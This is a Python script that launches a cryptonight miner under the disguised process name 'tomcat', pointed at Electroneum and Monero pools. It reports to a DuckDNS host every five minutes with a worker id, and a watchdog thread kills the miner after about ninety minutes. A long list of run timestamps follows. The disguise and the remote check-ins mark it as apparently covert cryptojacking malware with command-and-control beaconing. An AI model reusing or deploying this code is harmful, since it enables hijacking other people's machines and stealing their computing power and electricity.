import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:06.881421
#2018-02-17 16:30:07.943554
#2018-02-17 18:20:04.043291
#2018-02-17 20:08:06.035228
#2018-02-17 21:55:07.068784
#2018-02-17 23:40:03.902117
#2018-02-18 01:29:03.461875
#2018-02-18 03:16:04.612612
#2018-02-18 05:04:04.026522
#2018-02-18 06:56:01.911483
#2018-02-18 08:44:06.868954
#2018-02-18 10:31:07.644437
#2018-02-18 12:16:01.566196
#2018-02-18 14:03:06.019170
#2018-02-18 15:53:01.550897
#2018-02-18 17:43:02.230874
#2018-02-18 19:30:08.524242
#2018-02-18 21:15:08.839237
#2018-02-18 23:04:04.494994
#2018-02-19 00:51:03.665224
#2018-02-19 02:38:04.416879
#2018-02-19 04:24:04.221824
#2018-02-19 06:09:06.331910
#2018-02-19 07:57:03.608053
#2018-02-19 09:48:07.572748
#2018-02-19 11:38:07.384386
#2018-02-19 13:25:01.824843
#2018-02-19 15:12:07.981729
#2018-02-19 17:01:01.297003
#2018-02-19 18:47:07.720230
#2018-02-19 20:35:03.064866
#2018-02-19 22:23:06.592322
#2018-02-20 00:08:07.620061
#2018-02-20 01:55:01.679134
#2018-02-20 03:43:04.829579
#2018-02-20 05:28:01.926988
#2018-02-20 07:12:05.802433
#2018-02-20 08:59:04.140213
#2018-02-20 10:43:06.906225
#2018-02-20 12:29:09.002084
#2018-02-20 14:15:08.545655
#2018-02-20 15:58:04.098891
#2018-02-20 17:46:01.432573
#2018-02-20 19:38:01.437182
#2018-02-20 21:24:07.305217
#2018-02-20 23:09:03.704097
#2018-02-21 00:54:02.254949
#2018-02-21 02:39:01.500468
#2018-02-21 04:27:07.462389
#2018-02-21 06:15:04.158670
#2018-02-21 08:01:10.950435
#2018-02-21 09:46:01.668912
#2018-02-21 11:34:05.682620
#2018-02-21 13:24:03.897560
#2018-02-21 15:09:08.605384
#2018-02-21 16:57:11.853718
#2018-02-21 18:48:02.145084
#2018-02-21 20:37:08.117811
#2018-02-21 22:24:01.257052
#2018-02-22 00:14:06.017608
#2018-02-22 02:02:03.694915
#2018-02-22 03:49:01.718655
#2018-02-22 05:36:03.429722
#2018-02-22 07:21:04.532900
#2018-02-22 09:09:06.154429
#2018-02-22 10:57:02.210876
#2018-02-22 12:43:01.308392
#2018-02-22 14:30:10.083589
#2018-02-22 16:17:09.098027
#2018-02-22 18:04:06.276739
#2018-02-22 19:54:08.111123
#2018-02-22 21:44:04.525927
#2018-02-22 23:31:02.271796
#2018-02-23 01:19:06.511775
#2018-02-23 03:07:04.215272
#2018-02-23 04:56:07.576152
#2018-02-23 06:40:06.682010
#2018-02-23 08:29:02.044895
#2018-02-23 10:44:04.465379
#2018-02-23 12:40:09.045231
#2018-02-23 14:23:06.564025
#2018-02-23 16:15:11.968327
#2018-02-23 18:01:01.596913
#2018-02-23 19:46:10.014857
#2018-02-23 21:28:07.753833
#2018-02-23 23:17:01.570227
#2018-02-24 01:06:07.828792
#2018-02-24 02:57:07.186782
#2018-02-24 04:45:05.456116
#2018-02-24 06:29:01.736951
#2018-02-24 08:17:07.511840
#2018-02-24 10:02:08.172886
#2018-02-24 11:59:06.562815
#2018-02-24 13:46:07.687950
#2018-02-24 15:36:06.184391
#2018-02-24 17:31:06.893305
#2018-02-24 19:18:04.822991
#2018-02-24 21:07:04.786091
#2018-02-24 23:41:05.142977
#2018-02-25 03:01:08.176542
#2018-02-25 06:47:04.694446